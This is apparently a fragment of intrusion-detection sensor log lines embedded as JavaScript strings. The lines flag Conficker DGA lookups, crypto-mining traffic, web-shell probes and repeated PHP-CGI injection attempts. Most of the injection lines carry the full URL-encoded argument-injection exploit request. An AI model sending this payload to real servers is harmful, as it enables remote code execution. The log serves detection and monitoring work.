    '"2021-01-11 03:51:07.790149" r2d2 8.8.8.8 53 2.200.109.50 60659 UDP DNS (hgcxvmcwci).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:07.790154" r2d2 8.8.8.8 53 2.200.109.50 60659 UDP DNS (hgcxvmcwci).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:08.940199" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:08.940218" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:08.940208" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:08.940221" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:08.940216" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:08.940252" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.000042" r2d2 10.43.192.103 59190 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:51:09.179267" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.179270" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.179272" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.421788" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.421799" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.421797" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.668207" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.668281" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.668290" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.924775" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.924682" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:09.924693" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP HTTP "2.200.101.86(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:51:15.316163" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS sdqnc.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316150" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS gqejg.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316158" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS sdqnc.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316283" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS yqarrxevf.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316291" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS yqarrxevf.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316489" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS eskxas.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316544" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS pbjhralj.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.317013" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS hxtrweatse.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.317215" r2d2 2.200.109.50 61705 8.8.8.8 53 UDP DNS sdqnc.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316548" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS pbjhralj.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316848" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS rdcxxt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316669" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS wrlvqqsc.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.317027" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS hxtrweatse.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316726" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS ctxmqej.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.317492" r2d2 2.200.109.50 61036 8.8.8.8 53 UDP DNS yqarrxevf.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.316854" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS rdcxxt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.317100" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS lyytfnci.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:15.317967" r2d2 2.200.109.50 60875 8.8.8.8 53 UDP DNS ctxmqej.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:17.651787" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:17.651795" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:17.651778" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:17.651786" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:17.651789" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:17.651794" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:21.067996" r2d2 10.43.192.103 59192 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:51:23.823164" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS inhldbuatj.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823166" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS tzpkglbqdr.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823346" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS mdommm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823648" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ruabx.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823352" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS mdommm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823156" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS tzpkglbqdr.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823936" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS sgmgurympa.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823168" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS inhldbuatj.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823695" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ruabx.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823450" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS xbovjlrpswo.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.824061" r2d2 2.200.109.50 61341 8.8.8.8 53 UDP DNS tzpkglbqdr.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823818" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS qttjozs.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823701" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS hokhplgtzns.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.824740" r2d2 2.200.109.50 62086 8.8.8.8 53 UDP DNS hokhplgtzns.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823942" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS sgmgurympa.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.823876" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS qttjozs.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.824138" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS ykwqc.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.824000" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS olfcpc.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.825138" r2d2 2.200.109.50 61109 8.8.8.8 53 UDP DNS ykwqc.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:23.824442" r2d2 2.200.109.50 60925 8.8.8.8 53 UDP DNS mdommm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:24.012948" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:24.012951" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:24.012946" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:24.012949" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:24.012945" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:24.012950" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:51:25.209521" r2d2 61.153.224.158 31681 2.200.101.86 80 TCP URL (2.200.101.86)/shell.php "web shells (suspicious)" (static)\n' +
